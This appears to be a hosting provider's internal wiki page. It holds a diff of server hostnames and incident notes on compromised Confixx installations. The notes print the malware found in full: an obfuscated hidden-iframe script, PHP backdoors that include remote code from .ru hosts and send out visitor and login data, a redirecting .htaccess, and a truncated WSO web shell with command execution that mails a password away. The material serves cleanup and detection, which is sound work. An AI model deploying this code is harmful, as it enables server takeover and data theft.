− | login-78.hoststar.ch | + | login-78.hoststar.ch * |
− | login-79.hoststar.ch | + | login-79.hoststar.ch * |
− | login-8.hoststar.ch | + | login-8.hoststar.ch * |
− | login-9.hoststar.ch | + | login-9.hoststar.ch * |
− | tux27.hoststar.ch | + | tux27.hoststar.ch * |
− | tux33.hoststar.ch | + | tux33.hoststar.ch * |
− | tux9.hoststar.ch | + | tux9.hoststar.ch * |
Zeile 2.866: | Zeile 9.581: | ||
3.3.5 | 3.3.5 | ||
− | login-1.hoststar.at | + | login-1.hoststar.at * |
− | login-102.hoststar.ch | + | login-102.hoststar.ch * |
− | login-103.hoststar.ch | + | login-103.hoststar.ch * |
− | login-104.hoststar.ch | + | login-104.hoststar.ch * |
− | login-105.hoststar.ch | + | login-105.hoststar.ch * |
− | login-106.hoststar.ch | + | login-106.hoststar.ch * |
− | login-107.hoststar.ch | + | login-107.hoststar.ch * |
− | login-108.hoststar.ch | + | login-108.hoststar.ch * |
− | login-109.hoststar.ch | + | login-109.hoststar.ch * |
− | login-11.loginserver.ch | + | login-11.loginserver.ch * |
− | login-111.hoststar.ch | + | login-111.hoststar.ch * |
− | login-112.hoststar.ch | + | login-112.hoststar.ch * |
− | login-113.hoststar.ch | + | login-113.hoststar.ch * |
− | login-114.hoststar.ch | + | login-114.hoststar.ch * |
− | login-115.hoststar.ch | + | login-115.hoststar.ch * |
− | login-116.hoststar.ch | + | login-116.hoststar.ch * |
− | login-117.hoststar.ch | + | login-117.hoststar.ch * |
− | login-118.hoststar.ch | + | login-118.hoststar.ch * |
− | login-119.hoststar.ch | + | login-119.hoststar.ch * |
− | login-121.hoststar.ch | + | login-121.hoststar.ch * |
− | login-122.hoststar.ch | + | login-122.hoststar.ch * |
− | login-123.hoststar.ch | + | login-123.hoststar.ch * |
− | login-124.hoststar.ch | + | login-124.hoststar.ch * |
− | login-125.hoststar.ch | + | login-125.hoststar.ch * |
− | login-126.hoststar.ch | + | login-126.hoststar.ch * |
− | login-127.hoststar.ch | + | login-127.hoststar.ch * |
− | login-128.hoststar.ch | + | login-128.hoststar.ch * |
− | login-129.hoststar.ch | + | login-129.hoststar.ch * |
− | login-13.loginserver.ch | + | login-13.loginserver.ch * |
− | login-131.hoststar.ch | + | login-131.hoststar.ch * *reseller inst - danke* |
− | login-133.hoststar.ch | + | login-133.hoststar.ch * *reseller inst - danke* |
− | login-134.hoststar.ch | + | login-134.hoststar.ch * *reseller inst - danke* |
− | login-135.hoststar.ch | + | login-135.hoststar.ch * *reseller inst - danke* |
− | login-136.hoststar.ch | + | login-136.hoststar.ch * *reseller inst - danke* |
− | login-137.hoststar.ch | + | login-137.hoststar.ch * *reseller inst - danke* |
− | login-138.hoststar.ch | + | login-138.hoststar.ch * *reseller inst - danke* |
− | login-139.hoststar.ch | + | login-139.hoststar.ch * *reseller inst - danke* |
− | login-14.loginserver.ch | + | login-14.loginserver.ch * |
− | login-141.hoststar.ch | + | login-141.hoststar.ch * *reseller inst - danke* |
− | login-142.hoststar.ch | + | login-142.hoststar.ch * *reseller inst - danke* |
− | login-143.hoststar.ch | + | login-143.hoststar.ch * *reseller inst - danke* |
− | login-144.hoststar.ch | + | login-144.hoststar.ch * *reseller inst - danke* |
− | login-145.hoststar.ch | + | login-145.hoststar.ch * *reseller inst - danke* |
− | login-146.hoststar.ch | + | login-146.hoststar.ch * *reseller inst - danke* |
− | login-147.hoststar.ch | + | login-147.hoststar.ch * *reseller inst - danke* |
− | login-148.hoststar.ch | + | login-148.hoststar.ch * *reseller inst - danke* |
− | login-149.hoststar.ch | + | login-149.hoststar.ch * *reseller inst - danke* |
− | login-15.hoststar.at | + | login-15.hoststar.at * |
− | login-15.loginserver.ch | + | login-15.loginserver.ch * |
− | login-151.hoststar.ch | + | login-151.hoststar.ch * |
− | login-152.hoststar.ch | + | login-152.hoststar.ch * *reseller inst - danke* |
− | login-153.hoststar.ch | + | login-153.hoststar.ch * *reseller inst - danke* |
− | login-154.hoststar.ch | + | login-154.hoststar.ch * *reseller inst - danke* |
− | login-16.hoststar.at | + | login-16.hoststar.at * |
− | login-16.loginserver.ch | + | login-16.loginserver.ch * |
− | login-17.hoststar.at | + | login-17.hoststar.at * |
− | login-17.loginserver.ch | + | login-17.loginserver.ch * |
− | login-18.loginserver.ch | + | login-18.loginserver.ch * |
− | login-19.loginserver.ch | + | login-19.loginserver.ch * |
− | login-20.loginserver.ch | + | login-20.loginserver.ch * |
− | login-21.loginserver.ch | + | login-21.loginserver.ch * |
− | login-22.loginserver.ch | + | login-22.loginserver.ch * |
− | login-87.hoststar.ch | + | login-87.hoststar.ch * |
− | login-89.hoststar.ch | + | login-89.hoststar.ch * |
− | login-91.hoststar.ch | + | login-91.hoststar.ch * |
− | login-92.hoststar.ch | + | login-92.hoststar.ch * |
− | login-93.hoststar.ch | + | login-93.hoststar.ch * |
− | login-94.hoststar.ch | + | login-94.hoststar.ch * |
− | login-95.hoststar.ch | + | login-95.hoststar.ch * |
− | login-96.hoststar.ch | + | login-96.hoststar.ch * |
− | login-97.hoststar.ch | + | login-97.hoststar.ch * |
− | login-98.hoststar.ch | + | login-98.hoststar.ch * |
− | login-99.hoststar.ch | + | login-99.hoststar.ch * |
Aktuelle Version vom 17. September 2015, 17:27 Uhr
Hacked Confixx
grep for new files:
cat new_files.log | grep -v 'png$' | grep -v 'gif$' | grep -v 'jpg$' | grep -v 'bmp$' | grep -v 'phpt$' | sed ':a;N;$!ba;s/\n/ /g'
login-6.hoststar.ch:
some informations: http://lukewelling.com/category/spyware/
http://forums.jaguarpc.com/hosting-talk-chit-chat/13305-any-ideas-about-hack.html
/home/www/confixx/html/webapps/zencart/index.de.html:
/home/www/confixx/html/webapps/xrms/index.de.html:
/home/www/confixx/html/webapps/xoops/index.de.html:
/home/www/confixx/html/webapps/xaraya/index.de.html:
/home/www/confixx/html/webapps/weberp/index.de.html:
/home/www/confixx/html/webapps/wbbook/index.de.html:
/home/www/confixx/html/webapps/vstat/index.de.html:
... haben aber anderen code vorhanden ...
<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>
<div style="visibility: hidden; position: absolute; left: 1; top: 1">iframe src="http://user19.iframe.ru/?s=1" fraborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>
Search for "</p><a href=.*</a>" of for class=giepoaytr
you can use follow list to find some of them: http://www.maxispecialisten.se/punbb-1.2.7/sess31002/lk.txt http://www.afdex.com/common/board/data/Automatic_Multi_Stage_Cold_Forging/sess31002/lk.txt
/home/www/confixx/html/webapps/weberp/index.de.html:
<a href="http://gallery.ransomed.us/albums/album06/SMS-%2BSamsung%2BSGH-S500.shtml" class=giepoaytr title="SMS- Samsung SGH-S500" target=_blank>SMS- Samsung SGH-S500</a>
/home/www/confixx/html/webapps/wbbook/index.de.html:
<a href="http://www.woltlab.de/products/burning_book/demo/">http://www.woltlab.de/products/burning_book/demo/</a> <a href="http://www.flyfic.renaissance-ghost.net/stories/graphospasm/images/no%2Bcd%2Bcrack%2Btonka.jsp" class=giepoaytr title="no cd crack tonka">no cd crack tonka</a>
/home/www/confixx/html/webapps/vstat/index.de.html:
<a href="http://www.geraldlee.net/nm/jak%2Bm%2Bmio%2Bpl.phtml" class=giepoaytr target=_blank>jak m mio pl</a>
/home/www/confixx/html/webapps/typo/index.de.html:
<a href="http://www.konline.org/alber/gallery/albums/album02/Underground2-Crack.jsp" class=giepoaytr>Underground2-Crack</a>
/home/www/confixx/html/webapps/tsep/index.de.html:
<a href="http://www.squarefc.com/gallery/content/Mascot/diablo%202%20downlaod.phtml" class=giepoaytr>diablo 2 downlaod</a>
/home/www/confixx/html/webapps/topdownloads/index.de.html:
<a href="http://www.artmotion.between-worlds.net/iB_html/non-cgi/Skin/SKIN-2/grifin-barbie.html" class=giepoaytr title="grifin barbie">grifin barbie</a>
/home/www/confixx/html/webapps/template/index.de.html:
<a href="http://www.rockpoppyprincess.pinkgraffiti.com/cart/images/couter.strike1.6.dowload.shtml" class=giepoaytr>couter strike1.6 dowload</a>
/home/www/confixx/html/webapps/squirrelmail/index.de.html:
<a href="http://mkweb.mattkennedy.us/modules/news/images/topics/Warcraft_MAPHACK_v_1.20.shtml" class=giepoaytr>Warcraft MAPHACK v 1.20</a>
/home/www/confixx/html/webapps/zencart/guest.php:
/home/www/confixx/html/webapps/xrms/configs.php:
/home/www/confixx/html/webapps/xoops/include.php:
/home/www/confixx/html/webapps/xaraya/date.php:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
open data from "user7.htmltags.ru"
/home/www/confixx/html/webapps/zencart/create.php:
/home/www/confixx/html/webapps/xrms/messages.php:
/home/www/confixx/html/webapps/xoops/includes.php:
/home/www/confixx/html/webapps/xaraya/report.php:
<?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?>
open data from "http://bis.iframe.ru/master.php?r_addr="
/home/www/confixx/html/webapps/zencart/.htaccess:
/home/www/confixx/html/webapps/xrms/.htaccess:
/home/www/confixx/html/webapps/xoops/.htaccess:
/home/www/confixx/html/webapps/xaraya/.htaccess:
Options -MultiViews ErrorDocument 404 //webapps/zencart/guest.php
allways force an 404 error and redirect to malware file
/home/www/confixx/html/skins/mskin_19/small_icons/properties.php
<?php error_reporting(0); if(isset($_POST["l"]) and isset($_POST["p"])){ if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));} else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} }else{$user_auth="";} if(!isset($_POST["log_flg"])){$log_flg="&log";} if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) { if($_POST["l"]=="special"){print "sys_active". `uname -a`;} } ?>
/home/www/confixx/html/skins/mskin_19/small_icons/layout.php
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
login-101.hoststar.ch
<?php //-----------------Password--------------------- $â297a57a5a743894a0e4a801fc3"; //admin $â = "#fff"; $â = true; $â = 'UTF-8'; $â = 'FilesMan'; $â = md5($_SERVER['HTTP_USER_AGENT']); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { prototype(md5($_SERVER['HTTP_HOST'])."key", $â); } if(empty($_POST['charset'])) $_POST['charset'] = $â; if (!isset($_POST['ne'])) { if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); } function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);} @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('VERSION', '4.1.0'); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } if(!empty($â if(isset($_POST['pass']) && (md5($_POST['pass']) == $â rototype(md5($_SERVER['HTTP_HOST']), $â f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â ardLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; function hardHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['â']; global $â; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title> <style> body {background-color:#060a10;color:#e1e1e1;} body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;} table.info {color:#C3C3C3;background-color:#060a10;} span,h1,a {color:$â !important;} span {font-weight:bolder;} h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;} div.content {padding:5px;margin-left:5px;background-color:#060a10;} a {text-decoration:none;} a:hover {text-decoration:underline;} .ml1 {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;} .bigarea {width:100%;height:250px; } input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;} form {margin:0px;} #toolsTbl {text-align:center;} .toolsInp {width:300px} .main th {text-align:left;background-color:#060a10;} .main tr:hover{background-color:#354252;} .main td, th{vertical-align:middle;} .l1 {background-color:#1e252e;} pre {font:9pt Courier New;} </style> <script> var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; var a_ = '" . htmlspecialchars(@$_POST['a']) ."' var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; var d = document; function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);} function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;} function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;} function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $â) $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['â)) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'. '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'. '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>'; } function hardFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>"; echo " </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%> <tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=ne value=''> <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function ex($in) { $â = ''; if (function_exists('exec')) { @exec($in,$â); $â = @join("\n",$â); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $â = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $â = ob_get_clean(); } elseif (function_exists('shell_exec')) { $â = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $â = ""; while(!@feof($f)) $â .= fread($f,1024); pclose($f); }else return "â³ Unable to execute command\n"; return ($â==''?"â³ Query did not return anything\n":$â); } if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â; if(array_key_exists('pff',$_POST)){ $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp); } function hardLogin() { if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>"); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return 